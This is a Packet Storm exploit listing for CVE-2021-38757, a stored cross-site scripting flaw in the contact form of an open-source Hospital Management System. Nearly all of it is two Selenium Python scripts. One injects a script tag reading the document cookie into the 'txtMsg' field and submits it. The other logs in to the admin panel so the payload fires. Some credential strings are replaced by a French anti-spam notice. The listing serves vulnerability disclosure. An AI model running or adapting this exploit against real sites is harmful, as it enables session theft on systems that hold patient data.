Hospital Management System Cross Site Scripting ≈ Packet Storm

# Exploit Title: XSS-Stored PHPSESSID user PWNED on Hospital Management System Vulnerable parameter "txtMsg" on contact
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.17.2021
# Vendor: https://github.com/kishan0725/Hospital-Management-System
# Link: https://github.com/kishan0725/Hospital-Management-System
# CVE: CVE-2021-38757

[+] Exploit Source:

### P0C

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757

from selenium import webdriver
import time
import os

#enter the link to the website you want to automate login.
website_link="
http://192.168.1.3/Hospital-Management-System-master/contact.html"

browser = webdriver.Chrome()
browser.get((website_link))

try:
## The Exploit
browser.execute_script("document.querySelector('[name=\"txtName\"]').value=\"User\"")
browser.execute_script("document.querySelector('[name=\"txtEmail\"]').value=\"
Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.\"")
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")
browser.execute_script("document.querySelector('[name=\"txtMsg\"]').value=\"nu11secur1ty<script>alert(document.cookie)</script>\"")

## submit the exploit
browser.execute_script("document.querySelector('[name=\"btnSubmit\"]').click()")

# Check
os.system("python PoC-CVE-2021-38757-Check.py")

print("The payload for CVE CVE-2021-38757 is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

### Ch3ck

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757

from selenium import webdriver
import time

#enter the link to the website you want to automate login.
website_link="
http://192.168.1.3/Hospital-Management-System-master/index1.php"

#enter your login username
username="Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser."

#enter your login password
password="password"

#enter the element for username input field
element_for_username="email"
#enter the element for password input field
element_for_password="password2"
#enter the element for submit button
element_for_submit="patsub"

browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Check
time.sleep(3)
browser.maximize_window()
browser.get(("
http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"))

print("The payload for CVE CVE-2021-38757 is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

----------------------------------------------------------------------------------------

# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757
# Proof: https://streamable.com/6xue3b
# BR nu11secur1ty